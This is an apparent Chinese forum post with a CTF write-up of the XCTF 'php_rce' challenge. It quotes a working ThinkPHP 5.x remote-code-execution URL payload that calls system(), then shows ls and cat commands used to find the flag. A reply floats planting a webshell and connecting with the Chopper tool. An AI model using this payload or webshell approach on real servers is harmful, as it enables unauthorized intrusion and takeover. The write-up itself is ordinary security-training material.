安全矩阵

 找回密码
 立即注册
搜索
查看: 3243|回复: 1

xctf高级篇-3(rce远程命令/代码执行漏洞)

[复制链接]

4

主题

5

帖子

34

积分

新手上路

Rank: 1

积分
34
发表于 2020-3-31 22:45:30 | 显示全部楼层 |阅读模式
本帖最后由 lcq 于 2020-3-31 22:45 编辑

1.观察题目 php_rce 可知,考察php的远程代码执行漏洞



2.进入页面

观察到,版本为TP 的V5版本,百度该版本的rce漏洞,得到一个payload
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= *****(此处输入命令)


3.我们先尝试输入ls



打开各个php后未发现和flag相关内容
4.再依次打开../     ../../  ../../../   先观察有没有文件名和flag相关的,如果没有再去找具体的文件内部





最终 在../../../即上上上层目录中发现了一个flag文件(夹)


5.我们再尝试用cat ../../../flag命令查看内容

得到flag
flag{thinkphp5_rce}

ThinkPHP5.x rec 漏洞分析与复现博客
https://blog.csdn.net/qq_40884727/article/details/101452478

END


总结 这道题的提示还是很明显的,通过搜索引擎可以得到payload可以直接利用


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

4

主题

5

帖子

34

积分

新手上路

Rank: 1

积分
34
 楼主| 发表于 2020-3-31 22:56:56 | 显示全部楼层
另外 应该还可以通过该漏洞写入一个小马,用菜刀连接试试,这只是一个思路,暂未尝试
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 22:33 , Processed in 0.013041 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表